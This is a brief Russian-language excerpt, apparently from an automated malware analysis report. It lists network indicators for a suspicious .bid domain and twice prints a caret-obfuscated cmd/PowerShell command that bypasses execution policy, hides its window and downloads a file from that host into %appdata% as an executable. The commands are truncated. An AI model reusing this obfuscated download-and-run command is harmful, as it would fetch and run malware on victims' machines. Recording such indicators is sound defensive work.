Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWeR^sHell.eXE^ ^-exec^U^tIOnPO^lic^y ByPA^s^s -^N^o^pRo^file ^-^Wi^ndo^wStY^Le ^HidDe^N^ ^(^NEW-^oBjEc^t^ SY^sTe^m.^ne^t.^web^Cl^i^ENt^)^.D^OwnL^o^A^d^File^('http://asecwitlecn...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^oWeR^sHell.eXE^ ^-exec^U^tIOnPO^lic^y ByPA^s^s -^N^o^pRo^file ^-^Wi^ndo^wStY^Le ^HidDe^N^ ^(^NEW-^oBjEc^t^ SY^sTe^m.^ne^t.^web^Cl^i^ENt^)^.D^OwnL^o^A^d^File^('http://asecwitlecn...' (со скрытым окном)